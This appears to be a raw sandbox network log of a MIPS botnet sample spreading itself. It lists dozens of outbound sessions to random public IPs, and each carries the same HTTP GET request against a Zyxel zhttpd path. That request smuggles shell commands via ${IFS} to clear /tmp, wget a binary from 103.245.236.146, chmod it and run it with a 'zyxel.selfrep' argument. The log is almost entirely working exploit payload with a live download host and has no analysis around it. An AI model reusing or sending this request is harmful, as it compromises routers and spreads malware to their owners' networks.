                                                Jan 28, 2024 10:16:19.730623007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3088192.168.2.234445858.181.149.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730639935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3089192.168.2.2340230217.74.181.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730684042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3090192.168.2.2333942103.82.8.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730705976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3091192.168.2.2346296101.73.133.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730761051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3092192.168.2.234200072.73.165.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730779886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3093192.168.2.2351772188.130.120.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730837107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3094192.168.2.234932891.107.247.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730859995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3095192.168.2.234645072.223.37.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730876923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3096192.168.2.2356424198.22.157.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730900049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3097192.168.2.2348018170.240.114.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730937958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3098192.168.2.234350432.225.85.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730961084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3099192.168.2.234952238.250.170.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730978966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3100192.168.2.23355441.139.240.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731017113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3101192.168.2.2353846221.181.119.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731048107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3102192.168.2.2337756163.114.205.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731065035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3103192.168.2.2358128165.81.67.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731092930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3104192.168.2.2344754171.44.227.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731127024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3105192.168.2.233667647.138.124.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731149912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3106192.168.2.235894492.241.39.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731153965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3107192.168.2.235481043.94.93.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731188059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3108192.168.2.2332968165.125.145.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731204987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3109192.168.2.2356442173.173.145.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731249094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3110192.168.2.2332994198.141.188.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731254101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3111192.168.2.2359704133.63.131.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731283903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3112192.168.2.2347154179.122.68.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731333971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3113192.168.2.234484813.8.225.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731355906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3114192.168.2.2338252165.136.107.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731374025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3115192.168.2.235513873.129.114.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731417894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3116192.168.2.2332768199.152.20.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731442928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3117192.168.2.2351514140.101.160.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731472969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3118192.168.2.2353726212.227.53.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731489897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3119192.168.2.2353440163.195.103.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731523991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3120192.168.2.234072069.207.206.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731539965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3121192.168.2.235714425.216.82.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731575966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3122192.168.2.2344762186.21.142.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.731600046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3123192.168.2.2339498160.33.216.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.740530968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3124192.168.2.2354012163.68.89.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.740560055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3125192.168.2.2342742129.187.40.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.740577936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3126192.168.2.2336364129.253.69.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.740623951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3127192.168.2.234353461.126.210.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.740627050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3128192.168.2.2337408216.159.223.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.740659952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3129192.168.2.235451823.62.169.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.740680933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3130192.168.2.2354286141.103.142.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.740768909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3131192.168.2.233435088.211.209.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.740768909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3132192.168.2.235299812.41.94.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.740794897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3133192.168.2.2345166113.178.106.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.740813971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3134192.168.2.234359048.132.209.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.740861893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3135192.168.2.235867253.255.191.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.740881920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3136192.168.2.2357896167.77.97.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.740916014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3137192.168.2.2351200163.247.168.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.740947008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3138192.168.2.233597624.48.231.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.740982056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3139192.168.2.2352272125.66.58.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741009951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3140192.168.2.2356016113.220.135.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741065025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3141192.168.2.234378841.226.30.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741080046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3142192.168.2.2358984144.115.5.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741127968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3143192.168.2.233309638.138.53.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741143942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3144192.168.2.233539468.84.104.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741162062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3145192.168.2.233618238.101.119.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741211891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3146192.168.2.2356878194.123.254.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741255045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3147192.168.2.233753871.220.26.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741255045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3148192.168.2.235488283.175.23.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.741269112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3149192.168.2.235897459.87.60.187443
                                                TimestampBytes transferredDirectionData
